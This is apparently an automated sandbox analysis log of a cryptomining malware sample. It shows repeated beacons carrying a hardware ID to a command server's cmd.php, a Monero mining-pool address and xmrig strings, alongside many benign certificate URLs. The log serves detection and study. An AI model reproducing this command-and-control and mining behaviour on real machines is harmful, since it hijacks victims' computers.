                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficDNS traffic detected: DNS query: cv99160.tw1.ru
                  Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000335D000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cv99160.tw1.ru
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000335D000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cv99160.tw1.rud
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003357000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC072000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000692000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.drString found in binary or memory: https://cv99160.tw1.ru/cmd.php1pool.supportxmr.com:3333
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003116000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?hwid=B81A4609
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?hwid=B81A4609d
                  Source: yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?hwid=B8dJ
                  Source: yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?hwid=B8dv
                  Source: yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?tim
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003357000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003202000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?timeout=1
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?timeout=1d
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
